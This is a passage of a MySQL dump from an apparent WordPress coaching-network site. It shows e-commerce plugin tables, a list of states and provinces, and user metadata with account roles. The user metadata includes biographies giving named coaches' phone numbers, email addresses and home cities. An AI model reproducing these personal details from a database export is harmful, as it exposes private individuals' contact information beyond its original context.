) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;

-- --------------------------------------------------------

--
-- Table structure for table `cyb_toe_products_fields_to_categories`
--

CREATE TABLE IF NOT EXISTS `cyb_toe_products_fields_to_categories` (
  `products_field_id` int(11) NOT NULL DEFAULT '0',
  `category_id` int(11) NOT NULL DEFAULT '0',
  KEY `products_field_id` (`products_field_id`),
  KEY `category_id` (`category_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `cyb_toe_products_fields_to_products`
--

CREATE TABLE IF NOT EXISTS `cyb_toe_products_fields_to_products` (
  `products_field_id` int(11) NOT NULL DEFAULT '0',
  `product_id` int(11) NOT NULL DEFAULT '0',
  KEY `products_field_id` (`products_field_id`),
  KEY `product_id` (`product_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `cyb_toe_products_fields_to_products`
--

INSERT INTO `cyb_toe_products_fields_to_products` (`products_field_id`, `product_id`) VALUES
(1, 96);

-- --------------------------------------------------------

--
-- Table structure for table `cyb_toe_product_files`
--

CREATE TABLE IF NOT EXISTS `cyb_toe_product_files` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `pid` int(11) NOT NULL,
  `name` varchar(255) NOT NULL,
  `path` varchar(255) NOT NULL,
  `mime_type` varchar(255) DEFAULT NULL,
  `size` int(11) NOT NULL DEFAULT '0',
  `active` tinyint(1) NOT NULL,
  `date` datetime DEFAULT NULL,
  `download_limit` int(11) NOT NULL DEFAULT '0',
  `period_limit` int(11) NOT NULL DEFAULT '0',
  `description` text NOT NULL,
  `type_id` smallint(5) NOT NULL DEFAULT '1',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;

-- --------------------------------------------------------

--
-- Table structure for table `cyb_toe_product_files_types`
--

CREATE TABLE IF NOT EXISTS `cyb_toe_product_files_types` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(255) NOT NULL,
  `label` varchar(255) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8 AUTO_INCREMENT=3 ;

--
-- Dumping data for table `cyb_toe_product_files_types`
--

INSERT INTO `cyb_toe_product_files_types` (`id`, `name`, `label`) VALUES
(1, 'sell', 'For selling'),
(2, 'simple', 'Simple file');

-- --------------------------------------------------------

--
-- Table structure for table `cyb_toe_rating`
--

CREATE TABLE IF NOT EXISTS `cyb_toe_rating` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `pid` int(11) NOT NULL DEFAULT '0',
  `ip` varchar(32) CHARACTER SET utf8 COLLATE utf8_romanian_ci NOT NULL,
  `rate` tinyint(2) NOT NULL DEFAULT '0',
  `comment_id` int(11) NOT NULL DEFAULT '0',
  `approved` int(11) NOT NULL DEFAULT '1',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;

-- --------------------------------------------------------

--
-- Table structure for table `cyb_toe_related_widget`
--

CREATE TABLE IF NOT EXISTS `cyb_toe_related_widget` (
  `id` bigint(15) NOT NULL AUTO_INCREMENT,
  `rel_from` int(11) NOT NULL,
  `rel_to` int(11) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;

-- --------------------------------------------------------

--
-- Table structure for table `cyb_toe_shipping`
--

CREATE TABLE IF NOT EXISTS `cyb_toe_shipping` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `label` varchar(255) NOT NULL,
  `description` text,
  `code` varchar(128) NOT NULL,
  `params` text,
  `active` tinyint(1) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;

-- --------------------------------------------------------

--
-- Table structure for table `cyb_toe_states`
--

CREATE TABLE IF NOT EXISTS `cyb_toe_states` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(128) CHARACTER SET utf8 COLLATE utf8_romanian_ci NOT NULL,
  `code` varchar(6) CHARACTER SET utf8 COLLATE utf8_romanian_ci NOT NULL,
  `country_id` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8 AUTO_INCREMENT=71 ;

--
-- Dumping data for table `cyb_toe_states`
--

INSERT INTO `cyb_toe_states` (`id`, `name`, `code`, `country_id`) VALUES
(1, 'Alabama', 'AL', 225),
(2, 'Alaska', 'AK', 225),
(3, 'Arizona', 'AZ', 225),
(4, 'Arkansas', 'AR', 225),
(5, 'California', 'CA', 225),
(6, 'Colorado', 'CO', 225),
(7, 'Connecticut', 'CT', 225),
(8, 'Delaware', 'DE', 225),
(9, 'District Of Columbia', 'DC', 225),
(10, 'Florida', 'FL', 225),
(11, 'Georgia', 'GA', 225),
(12, 'Hawaii', 'HI', 225),
(13, 'Idaho', 'ID', 225),
(14, 'Illinois', 'IL', 225),
(15, 'Indiana', 'IN', 225),
(16, 'Iowa', 'IA', 225),
(17, 'Kansas', 'KS', 225),
(18, 'Kentucky', 'KY', 225),
(19, 'Louisiana', 'LA', 225),
(20, 'Maine', 'ME', 225),
(21, 'Maryland', 'MD', 225),
(22, 'Massachusetts', 'MA', 225),
(23, 'Michigan', 'MI', 225),
(24, 'Minnesota', 'MN', 225),
(25, 'Mississippi', 'MS', 225),
(26, 'Missouri', 'MO', 225),
(27, 'Montana', 'MT', 225),
(28, 'Nebraska', 'NE', 225),
(29, 'Nevada', 'NV', 225),
(30, 'New Hampshire', 'NH', 225),
(31, 'New Jersey', 'NJ', 225),
(32, 'New Mexico', 'NM', 225),
(33, 'New York', 'NY', 225),
(34, 'North Carolina', 'NC', 225),
(35, 'North Dakota', 'ND', 225),
(36, 'Ohio', 'OH', 225),
(37, 'Oklahoma', 'OK', 225),
(38, 'Oregon', 'OR', 225),
(39, 'Pennsylvania', 'PA', 225),
(40, 'Rhode Island', 'RI', 225),
(41, 'South Carolina', 'SC', 225),
(42, 'South Dakota', 'SD', 225),
(43, 'Tennessee', 'TN', 225),
(44, 'Texas', 'TX', 225),
(45, 'Utah', 'UT', 225),
(46, 'Vermont', 'VT', 225),
(47, 'Virginia', 'VA', 225),
(48, 'Washington', 'WA', 225),
(49, 'West Virginia', 'WV', 225),
(50, 'Wisconsin', 'WI', 225),
(51, 'Wyoming', 'WY', 225),
(52, 'British Columbia', 'BC', 38),
(53, 'Ontario', 'ON', 38),
(54, 'Newfoundland and Labrador', 'NL', 38),
(55, 'Nova Scotia', 'NS', 38),
(56, 'Prince Edward Island', 'PE', 38),
(57, 'New Brunswick', 'NB', 38),
(58, 'Quebec', 'QC', 38),
(59, 'Manitoba', 'MB', 38),
(60, 'Saskatchewan', 'SK', 38),
(61, 'Alberta', 'AB', 38),
(62, 'Northwest Territories', 'NT', 38),
(63, 'Nunavut', 'NU', 38),
(64, 'Yukon Territory', 'YT', 38),
(65, 'South Australia', 'SA', 13),
(66, 'Tasmania', 'TAS', 13),
(67, 'New South Wales', 'NSW', 13),
(68, 'Victoria', 'VIC', 13),
(69, 'Western Australia', 'WA', 13),
(70, 'Queensland', 'QLD', 13);

-- --------------------------------------------------------

--
-- Table structure for table `cyb_toe_subscribers`
--

CREATE TABLE IF NOT EXISTS `cyb_toe_subscribers` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `user_id` int(11) NOT NULL DEFAULT '0',
  `email` varchar(255) NOT NULL,
  `name` varchar(255) DEFAULT NULL,
  `created` datetime NOT NULL,
  `unsubscribe_date` datetime DEFAULT NULL,
  `active` tinyint(4) NOT NULL DEFAULT '1',
  `token` varchar(255) DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `user_id` (`user_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;

-- --------------------------------------------------------

--
-- Table structure for table `cyb_toe_taxes`
--

CREATE TABLE IF NOT EXISTS `cyb_toe_taxes` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `label` varchar(128) NOT NULL,
  `type` enum('address','total','category','undefined') NOT NULL DEFAULT 'undefined',
  `data` text,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;

-- --------------------------------------------------------

--
-- Table structure for table `cyb_toe_usage_stat`
--

CREATE TABLE IF NOT EXISTS `cyb_toe_usage_stat` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `code` varchar(64) NOT NULL,
  `visits` int(11) NOT NULL DEFAULT '0',
  `spent_time` int(11) NOT NULL DEFAULT '0',
  `modify_timestamp` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  PRIMARY KEY (`id`),
  UNIQUE KEY `code` (`code`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8 AUTO_INCREMENT=21 ;

--
-- Dumping data for table `cyb_toe_usage_stat`
--

INSERT INTO `cyb_toe_usage_stat` (`id`, `code`, `visits`, `spent_time`, `modify_timestamp`) VALUES
(1, 'installed', 1, 0, '2014-03-12 21:36:01'),
(2, 'adminmenu.showMenuMainPage', 38, 0, '2014-03-12 21:37:48'),
(3, 'option.optionTab', 49, 0, '2014-03-12 21:38:33'),
(4, 'products.list', 77, 0, '2014-03-12 21:40:30'),
(5, 'products.edit', 150, 0, '2014-03-12 21:41:04'),
(6, 'order.getAllOrders', 16, 0, '2014-03-12 21:54:44'),
(7, 'options.paymentsTab', 18, 0, '2014-03-12 22:34:43'),
(8, 'checkout.checkoutTab', 10, 0, '2014-03-12 22:58:32'),
(9, 'pages.pagesTab', 6, 0, '2014-03-12 22:59:07'),
(10, 'templates.templatesTab', 7, 0, '2014-03-12 22:59:41'),
(11, 'user.userFieldsTab', 6, 0, '2014-03-12 23:00:04'),
(12, 'products_fields.products_fields', 7, 0, '2014-03-12 23:00:17'),
(13, 'products.productViewTab', 10, 0, '2014-03-12 23:00:43'),
(14, 'log.getList', 2, 0, '2014-03-12 23:15:54'),
(15, 'products_categories.list', 15, 0, '2014-03-13 09:17:03'),
(16, 'products_categories.edit', 22, 0, '2014-03-13 09:29:51'),
(17, 'shipping.shipping', 1, 0, '2014-03-13 09:48:36'),
(18, 'currency.currencyTab', 3, 0, '2014-03-13 22:20:50'),
(19, 'messenger.messengerTab', 1, 0, '2014-05-15 14:58:30'),
(20, 'products_brands.list', 2, 0, '2014-05-16 17:23:42');

-- --------------------------------------------------------

--
-- Table structure for table `cyb_toe_user_files`
--

CREATE TABLE IF NOT EXISTS `cyb_toe_user_files` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `uid` int(11) NOT NULL,
  `order_id` int(11) NOT NULL,
  `fid` int(11) NOT NULL,
  `downloads` int(11) NOT NULL DEFAULT '0',
  `expires` datetime DEFAULT NULL,
  `token` text,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;

-- --------------------------------------------------------

--
-- Table structure for table `cyb_toe_variations`
--

CREATE TABLE IF NOT EXISTS `cyb_toe_variations` (
  `id` int(15) NOT NULL AUTO_INCREMENT,
  `product_id` int(11) NOT NULL,
  `variation_id` int(11) NOT NULL,
  `var_name` varchar(128) NOT NULL,
  `var_sort_order` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;

-- --------------------------------------------------------

--
-- Table structure for table `cyb_usermeta`
--

CREATE TABLE IF NOT EXISTS `cyb_usermeta` (
  `umeta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext,
  PRIMARY KEY (`umeta_id`),
  KEY `user_id` (`user_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM  DEFAULT CHARSET=utf8 AUTO_INCREMENT=54011 ;

--
-- Dumping data for table `cyb_usermeta`
--

INSERT INTO `cyb_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES
(1, 4194, 'first_name', ''),
(2, 4194, 'last_name', ''),
(3, 4194, 'nickname', 'admin'),
(4, 4194, 'description', 'Coach''s biographical write-up'),
(5, 4194, 'rich_editing', 'true'),
(6, 4194, 'comment_shortcuts', 'false'),
(7, 4194, 'admin_color', 'fresh'),
(8, 4194, 'use_ssl', '0'),
(9, 4194, 'show_admin_bar_front', 'true'),
(10, 4194, 'cyb_capabilities', 'a:1:{s:13:"administrator";b:1;}'),
(11, 4194, 'cyb_user_level', '10'),
(12, 4194, 'dismissed_wp_pointers', 'wp330_toolbar,wp330_saving_widgets,wp340_choose_image_from_library,wp340_customize_current_theme_link,wp350_media,wp360_revisions,wp360_locks'),
(13, 4194, 'show_welcome_panel', '1'),
(14, 4194, 'cyb_dashboard_quick_press_last_post_id', '1540'),
(15, 4194, 'cyb_user-settings', 'editor=html&libraryContent=browse&ed_size=507&advImgDetails=show&hidetb=1&urlbutton=none&align=center&imgsize=medium&wplink=1'),
(16, 4194, 'cyb_user-settings-time', '1413140274'),
(17, 4194, 'closedpostboxes_page', 'a:1:{i:0;s:11:"tsa-metabox";}'),
(18, 4194, 'metaboxhidden_page', 'a:3:{i:0;s:10:"postcustom";i:1;s:11:"commentsdiv";i:2;s:7:"slugdiv";}'),
(19, 4194, 'closedpostboxes_product', 'a:1:{i:0;s:11:"tsa-metabox";}'),
(20, 4194, 'metaboxhidden_product', 'a:0:{}'),
(21, 4194, 'managenav-menuscolumnshidden', 'a:4:{i:0;s:11:"link-target";i:1;s:11:"css-classes";i:2;s:3:"xfn";i:3;s:11:"description";}'),
(22, 4194, 'metaboxhidden_nav-menus', 'a:6:{i:0;s:8:"add-post";i:1;s:11:"add-product";i:2;s:12:"add-post_tag";i:3;s:15:"add-post_format";i:4;s:15:"add-product-tag";i:5;s:15:"add-product_cat";}'),
(23, 2, 'first_name', ''),
(24, 2, 'last_name', ''),
(25, 2, 'nickname', 'lionine'),
(26, 2, 'description', '<b><a href="tel:415.472.6500">415.472.6500</a>, San Rafael, California, <a href="mailto:Lion@BeliefCloset.com">Lion@BeliefCloset.com</a>, <a href="http://www.TransformYourBeliefs.com">www.TransformYourBeliefs.com</a></b>\r\n\r\n\r\nSpecialty: Founder and Creator of The BeliefCloset Process, Lion works with coaches, therapists, senior executives, and entrepreneurs to expand their perspectives, awaken infinite possibilities, and ensure success in their endeavors. He is a trained True Purpose Coach and utilizes a wide variety of methodologies to empower individuals to shine their greatest light into the world.'),
(27, 2, 'rich_editing', 'true'),
(28, 2, 'comment_shortcuts', 'false'),
(29, 2, 'admin_color', 'fresh'),
(30, 2, 'use_ssl', '0'),
(31, 2, 'show_admin_bar_front', 'true'),
(32, 2, 'cyb_capabilities', 'a:1:{s:13:"administrator";b:1;}'),
(33, 2, 'cyb_user_level', '10'),
(34, 2, 'dismissed_wp_pointers', 'wp330_toolbar,wp330_saving_widgets,wp340_choose_image_from_library,wp340_customize_current_theme_link,wp350_media,wp360_revisions,wp360_locks,wp390_widgets,wr_pb_settings_pointer,wp410_dfw'),
(35, 3, 'first_name', ''),
(36, 3, 'last_name', ''),
(37, 3, 'nickname', 'stan'),
(38, 3, 'description', '<b><a href="tel:(650) 787-2631">(650) 787-2631</a>, San Carlos, California, <a href="mailto:empowermentcoaching@mac.com">empowermentcoaching@mac.com</a>, <a href="http://www.EmpowermentCoaching.com">www.EmpowermentCoaching.com</a></b> \r\n\r\nSpecialty: Executives and leaders of companies and teams, especially in technology organizations. 30 years experience at Apple Computer in Silicon Valley as a technology development manager. Specializing in aligning individuals with their own sense of joy.'),
(39, 3, 'rich_editing', 'true'),
(40, 3, 'comment_shortcuts', 'false'),
(41, 3, 'admin_color', 'fresh'),
(42, 3, 'use_ssl', '0'),
(43, 3, 'show_admin_bar_front', 'true'),
(44, 3, 'cyb_capabilities', 'a:1:{s:6:"author";b:1;}'),
(45, 3, 'cyb_user_level', '2'),
(46, 3, 'dismissed_wp_pointers', 'wp330_toolbar,wp330_saving_widgets,wp340_choose_image_from_library,wp340_customize_current_theme_link,wp350_media,wp360_revisions,wp360_locks'),
(47, 4194, 'closedpostboxes_post', 'a:0:{}'),
(48, 4194, 'metaboxhidden_post', 'a:5:{i:0;s:11:"postexcerpt";i:1;s:13:"trackbacksdiv";i:2;s:10:"postcustom";i:3;s:16:"commentstatusdiv";i:4;s:7:"slugdiv";}'),
(49, 4194, 'vfb-form-settings', 'a:1:{i:1;a:2:{s:16:"form_setting_tab";s:6:"opened";s:17:"setting_accordion";s:12:"notification";}}'),
(50, 4194, 'nav_menu_recently_edited', '3'),
(51, 2, 'userphoto_approvalstatus', '2'),
(52, 2, 'userphoto_image_file', '2.jpg'),
(53, 2, 'userphoto_image_width', '105'),
(54, 2, 'userphoto_image_height', '150'),
(55, 2, 'userphoto_thumb_file', '2.thumbnail.jpg'),
(56, 2, 'userphoto_thumb_width', '56'),
(57, 2, 'userphoto_thumb_height', '80'),
(58, 4194, 'default_password_nag', ''),
(59, 2, 'cyb_dashboard_quick_press_last_post_id', '3987'),
(60, 2, 'cyb_user-settings', 'mfold=o&editor=tinymce&libraryContent=browse&align=center&hidetb=1&urlbutton=none&uploader=1&imgsize=full&advImgDetails=show&ed_size=828&wplink=1&edit_element_vcUIPanelWidth=650&edit_element_vcUIPanelLeft=509px&edit_element_vcUIPanelTop=74px'),
(61, 2, 'cyb_user-settings-time', '1525141108'),
(62, 2, 'closedpostboxes_dashboard', 'a:0:{}'),
(63, 2, 'metaboxhidden_dashboard', 'a:0:{}'),
(836, 61, 'first_name', ''),
(64, 4, 'first_name', ''),
(65, 4, 'last_name', ''),
(66, 4, 'nickname', 'dawn'),
(67, 4, 'description', '<a href="tel:9198122831">919-812-2831</a>, Clayton, NC; <a href="mailto:weaverdh2004@yahoo.com">weaverdh2004@yahoo.com</a>\r\n\r\nDawn is an expert in the use of the BeliefCloset Process with both adults and children.  She is the Training Manager for BeliefCloset programs.  Dawn works with people who feel lost, or stuck, in moving forward toward their goals and the manifestation of their greatest life purpose.   She helps her clients find the core beliefs that are stopping their forward movement, and clearing them, one-by-one, until the path is open.'),
(68, 4, 'rich_editing', 'true'),
(69, 4, 'comment_shortcuts', 'false'),
(70, 4, 'admin_color', 'fresh'),
(71, 4, 'use_ssl', '0'),
(72, 4, 'show_admin_bar_front', 'true'),
(73, 4, 'cyb_capabilities', 'a:1:{s:6:"author";b:1;}'),
(74, 4, 'cyb_user_level', '2'),
(75, 4, 'dismissed_wp_pointers', 'wp330_toolbar,wp330_saving_widgets,wp340_choose_image_from_library,wp340_customize_current_theme_link,wp350_media,wp360_revisions,wp360_locks'),
(76, 5, 'first_name', ''),
(77, 5, 'last_name', ''),
(78, 5, 'nickname', 'virginia'),
(79, 5, 'description', '<a href="tel:6105851441">610-585-1441</a>, Malvern, Pennsylvania, <a href="mailto:vmckinnie@comcast.net">vmckinnie@comcast.net</a>\r\n\r\nVirginia works with those who are stuck in their creative expression, or want to use writing as a tool for accessing their unconscious.  Creative blocks permeate all aspects of life, and arise from deep wounds and old beliefs.  Clearing beliefs opens up the channel for creative expression.'),
(80, 5, 'rich_editing', 'true'),
(81, 5, 'comment_shortcuts', 'false'),
(82, 5, 'admin_color', 'fresh'),
(83, 5, 'use_ssl', '0'),
(84, 5, 'show_admin_bar_front', 'true'),
(85, 5, 'cyb_capabilities', 'a:1:{s:6:"author";b:1;}'),
(86, 5, 'cyb_user_level', '2'),
(87, 5, 'dismissed_wp_pointers', 'wp330_toolbar,wp330_saving_widgets,wp340_choose_image_from_library,wp340_customize_current_theme_link,wp350_media,wp360_revisions,wp360_locks,wp410_dfw'),
(88, 6, 'first_name', ''),
(89, 6, 'last_name', ''),
(90, 6, 'nickname', 'claire'),
(91, 6, 'description', '<a href="tel:5416597284">541-659-7284</a>, Grants Pass, Oregon, <a>clairesierra@yahoo.com</a>, <a href="www.RadiantClarity.com">www.RadiantClarity.com</a>\r\n\r\nClaire guides those who yearn for true purpose to Divine connection, hope and clarity.  Claire is an Art Therapist and True Purpose Coach.'),
(92, 6, 'rich_editing', 'true'),
(93, 6, 'comment_shortcuts', 'false'),
(94, 6, 'admin_color', 'fresh'),
(95, 6, 'use_ssl', '0'),
(96, 6, 'show_admin_bar_front', 'true'),
(97, 6, 'cyb_capabilities', 'a:1:{s:6:"author";b:1;}'),
(98, 6, 'cyb_user_level', '2'),
(99, 6, 'dismissed_wp_pointers', 'wp330_toolbar,wp330_saving_widgets,wp340_choose_image_from_library,wp340_customize_current_theme_link,wp350_media,wp360_revisions,wp360_locks'),
(100, 6, 'userphoto_approvalstatus', '2'),
(101, 6, 'userphoto_image_file', '6.jpg'),
(102, 6, 'userphoto_image_width', '117'),
(103, 6, 'userphoto_image_height', '150'),
(104, 6, 'userphoto_thumb_file', '6.thumbnail.jpg'),
(105, 6, 'userphoto_thumb_width', '62'),
(106, 6, 'userphoto_thumb_height', '80'),
(107, 7, 'first_name', ''),
(108, 7, 'last_name', ''),
(109, 7, 'nickname', 'hardy'),
(110, 7, 'description', '<a href="tel:6037639770">603-763-9770</a>, New London, New Hampshire, <a href="mailto:hardy@nlmcoach.com">hardy@nlmcoach.com</a>, <a href="www.ThrivingBusinessPartners.com">www.ThrivingBusinessPartners.com</a>\r\n\r\nHardy works exclusively with business owners and partners in privately-held businesses who want to create harmony and wealth by eliminating conflicts in values, priorities, and goals. He helps partners eliminate beliefs and practices that get in the way, preventing partners from communicating clearly and working together with open hearts.'),
(111, 7, 'rich_editing', 'true'),
(112, 7, 'comment_shortcuts', 'false'),
(113, 7, 'admin_color', 'fresh'),
(114, 7, 'use_ssl', '0'),
(115, 7, 'show_admin_bar_front', 'true'),
(116, 7, 'cyb_capabilities', 'a:1:{s:6:"author";b:1;}'),
(117, 7, 'cyb_user_level', '2'),
(118, 7, 'dismissed_wp_pointers', 'wp330_toolbar,wp330_saving_widgets,wp340_choose_image_from_library,wp340_customize_current_theme_link,wp350_media,wp360_revisions,wp360_locks'),
(119, 8, 'first_name', ''),
(120, 8, 'last_name', ''),
(121, 8, 'nickname', 'howard'),
(122, 8, 'description', '<a href="4154626692">415-462-6692</a>, San Rafael, California, <a href="howard@breakthroughcoaching.cc">howard@breakthroughcoaching.cc</a>, <a href="www.breakthroughcoaching.cc">www.breakthroughcoaching.cc</a>\r\n\r\nHoward is a career transition specialist, working with those seeking to optimize their personal development and growth. Founder of Career Crafting and Breakthrough Coaching, Howard helps individuals align their life purpose and values with their work and career.  He teaches Relationship Mastery Selling and other personal development courses.  The BeliefCloset Process is one component of a soon-to-be-released personal mastery course, Upgrading Your Human Operating System.\r\nMaria Garcia'),
(123, 8, 'rich_editing', 'true'),
(124, 8, 'comment_shortcuts', 'false'),
(125, 8, 'admin_color', 'fresh'),
(126, 8, 'use_ssl', '0'),
(127, 8, 'show_admin_bar_front', 'true'),
(128, 8, 'cyb_capabilities', 'a:1:{s:6:"author";b:1;}'),
(129, 8, 'cyb_user_level', '2'),
(130, 8, 'dismissed_wp_pointers', 'wp330_toolbar,wp330_saving_widgets,wp340_choose_image_from_library,wp340_customize_current_theme_link,wp350_media,wp360_revisions,wp360_locks'),
(131, 8, 'userphoto_approvalstatus', '2'),
(132, 8, 'userphoto_image_file', '8.jpg'),
(133, 8, 'userphoto_image_width', '100'),
(134, 8, 'userphoto_image_height', '150'),
(135, 8, 'userphoto_thumb_file', '8.thumbnail.jpg'),
(136, 8, 'userphoto_thumb_width', '53'),
(137, 8, 'userphoto_thumb_height', '80'),
(138, 9, 'first_name', ''),
(139, 9, 'last_name', ''),
(140, 9, 'nickname', 'maria'),
(141, 9, 'description', '<a href="tel:6109333435">610-933-3435</a>, Phoenixville, Pennsylvania, <a href="mariajgarcia@verizon.net">mariajgarcia@verizon.net</a>\r\n\r\nMaria works with people who want to make sustained positive shifts in their personal lives and relationships, gain clarity about their life purpose, and want to shift from work &amp;career to Right Livelihood. Her clients experience a sense of clarity, openness and freedom, and an increase in enthusiasm for life.  She says “The BeliefCloset Process is the best tool I’ve found for permanently discreating destructive and limiting beliefs and replacing them with ones that empower and support creativity and healing.”'),
(142, 9, 'rich_editing', 'true'),
(143, 9, 'comment_shortcuts', 'false'),
(144, 9, 'admin_color', 'fresh'),
(145, 9, 'use_ssl', '0'),
(146, 9, 'show_admin_bar_front', 'true'),
(147, 9, 'cyb_capabilities', 'a:1:{s:6:"author";b:1;}'),
(148, 9, 'cyb_user_level', '2'),
(149, 9, 'dismissed_wp_pointers', 'wp330_toolbar,wp330_saving_widgets,wp340_choose_image_from_library,wp340_customize_current_theme_link,wp350_media,wp360_revisions,wp360_locks,wp410_dfw'),
(150, 10, 'first_name', ''),
(151, 10, 'last_name', ''),
(152, 10, 'nickname', 'beth'),
(153, 10, 'description', '<a href="tel:7812489877">781-248-9877</a>, Boston, Massachusetts, <a href="mailto:DreamCoach06@aol.com">DreamCoach06@aol.com</a>\r\n\r\nWith a background in human resources and organizational development, Beth helps her clients live authentic, meaningful, balanced and joyful lives and actualize their life dreams. She is a a trained True Purpose Coach, and combines that practice with the BeliefCloset Process, dream work, metaphysics, and organizational psychology. She works with both individuals and organizations.'),
(154, 10, 'rich_editing', 'true'),
(155, 10, 'comment_shortcuts', 'false'),
(156, 10, 'admin_color', 'fresh'),
(157, 10, 'use_ssl', '0'),
(158, 10, 'show_admin_bar_front', 'true'),
(159, 10, 'cyb_capabilities', 'a:1:{s:6:"author";b:1;}'),
(160, 10, 'cyb_user_level', '2'),
(161, 10, 'dismissed_wp_pointers', 'wp330_toolbar,wp330_saving_widgets,wp340_choose_image_from_library,wp340_customize_current_theme_link,wp350_media,wp360_revisions,wp360_locks'),
(162, 11, 'first_name', ''),
(163, 11, 'last_name', ''),
(164, 11, 'nickname', 'sherri'),
(165, 11, 'description', '<a href="tel:7057415447">(705) 741-5447</a>, Ontario, Canada.\r\n<a href="mailto:joyeveryday@sympatico.ca">joyeveryday@sympatico.ca</a>'),
(166, 11, 'rich_editing', 'true'),
(167, 11, 'comment_shortcuts', 'false'),
(168, 11, 'admin_color', 'fresh'),
(169, 11, 'use_ssl', '0'),
(170, 11, 'show_admin_bar_front', 'true'),
(171, 11, 'cyb_capabilities', 'a:1:{s:6:"author";b:1;}'),
(172, 11, 'cyb_user_level', '2'),
(173, 11, 'dismissed_wp_pointers', 'wp330_toolbar,wp330_saving_widgets,wp340_choose_image_from_library,wp340_customize_current_theme_link,wp350_media,wp360_revisions,wp360_locks'),
(174, 12, 'first_name', ''),
(175, 12, 'last_name', ''),
(176, 12, 'nickname', 'susan'),
(177, 12, 'description', '<a href="tel:641-472-8352">641-472-8352</a>\r\n<a href="mailto:susan@lisco.com">susan@lisco.com</a>\r\n<a href="www.yoursedonacoach.com">www.yoursedonacoach.com</a>'),
(178, 12, 'rich_editing', 'true'),
(179, 12, 'comment_shortcuts', 'false'),
(180, 12, 'admin_color', 'fresh'),
(181, 12, 'use_ssl', '0'),
(182, 12, 'show_admin_bar_front', 'true'),
(183, 12, 'cyb_capabilities', 'a:1:{s:6:"author";b:1;}'),
(184, 12, 'cyb_user_level', '2'),
(185, 12, 'dismissed_wp_pointers', 'wp330_toolbar,wp330_saving_widgets,wp340_choose_image_from_library,wp340_customize_current_theme_link,wp350_media,wp360_revisions,wp360_locks'),
(186, 13, 'first_name', ''),
(187, 13, 'last_name', ''),
(188, 13, 'nickname', 'tom'),
(189, 13, 'description', '<a href="tel:6147876826">614.787.6826</a>, Columbus, Ohio, <a href="mailto:Tom@YourPurposeGuide.com">Tom@YourPurposeGuide.com</a>\r\n\r\nHelping leaders who yearn to make a bigger difference play the bigger game they were meant to play. There is a need for transformed leaders to show the way and ensure the new world’s fragile emergence. Transforming yourself is the first step. Then, transform your organization, your community and the world. Bring your greatest gifts to the world by eliminating whatever is holding you back from expressing your deepest values and highest purpose.'),
(190, 13, 'rich_editing', 'true'),
(191, 13, 'comment_shortcuts', 'false'),
(192, 13, 'admin_color', 'fresh'),
(193, 13, 'use_ssl', '0'),
(194, 13, 'show_admin_bar_front', 'true'),
(195, 13, 'cyb_capabilities', 'a:1:{s:6:"author";b:1;}'),
(196, 13, 'cyb_user_level', '2'),
(197, 13, 'dismissed_wp_pointers', 'wp330_toolbar,wp330_saving_widgets,wp340_choose_image_from_library,wp340_customize_current_theme_link,wp350_media,wp360_revisions,wp360_locks'),
(198, 14, 'first_name', ''),
(199, 14, 'last_name', ''),
(200, 14, 'nickname', 'dave'),
(201, 14, 'description', '<a href="tel:6047396053">604.739.6053</a>, Vancouver, BC, Canada, <a href="mailto:DaveWaugh@telus.net">DaveWaugh@telus.net</a>\r\n\r\nDave is a Registered Professional Counselor and Mentor. He helps professionals who want a meaningful and prosperous life, and know they need more clarity about their direction. For many otherwise successful people, there are also wounds that must be healed from the past. Once healing occurs, success comes much more easily.'),
(202, 14, 'rich_editing', 'true'),
(203, 14, 'comment_shortcuts', 'false'),
(204, 14, 'admin_color', 'fresh'),
(205, 14, 'use_ssl', '0'),
(206, 14, 'show_admin_bar_front', 'true'),
(207, 14, 'cyb_capabilities', 'a:1:{s:6:"author";b:1;}'),
(208, 14, 'cyb_user_level', '2'),
(209, 14, 'dismissed_wp_pointers', 'wp330_toolbar,wp330_saving_widgets,wp340_choose_image_from_library,wp340_customize_current_theme_link,wp350_media,wp360_revisions,wp360_locks'),
(210, 14, 'userphoto_approvalstatus', '2'),
(211, 14, 'userphoto_image_file', '14.jpg'),
(212, 14, 'userphoto_image_width', '111'),
(213, 14, 'userphoto_image_height', '150'),
